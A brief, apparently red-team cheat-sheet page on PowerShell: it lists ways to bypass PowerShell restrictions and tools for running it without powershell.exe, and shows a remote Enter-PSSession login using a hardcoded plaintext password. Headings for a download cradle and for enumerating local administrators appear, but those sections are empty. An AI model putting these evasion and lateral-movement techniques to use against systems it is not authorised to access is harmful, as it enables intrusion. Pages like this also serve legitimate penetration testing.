search

Powershell

Bypasses for using powershell

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe # 32 Bit
    
Custom EXEs using the System.Management.Automation.dll
UnmanagedPowerShell
NotPowerShell
PSAttack  ## Can bundle in your own modules very useful.

hashtag
Enter-PSSession

Can have mixed results documentation can be found herearrow-up-right.

$password = ConvertTo-SecureString "PasswordPassword123!!" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("remoteadmin", $password)
Enter-PSSession -ComputerName Remote01 -Credential $cred
[Remote01]: PS C:\Users\remoteadmin\Documents> whoami
whoami
Remote01\remoteadmin

hashtag
Useful one liners

hashtag
Retrieve Local Administrators

hashtag
Download Cradle

PreviousScheduled TasksNextWindows Privesc

Last updated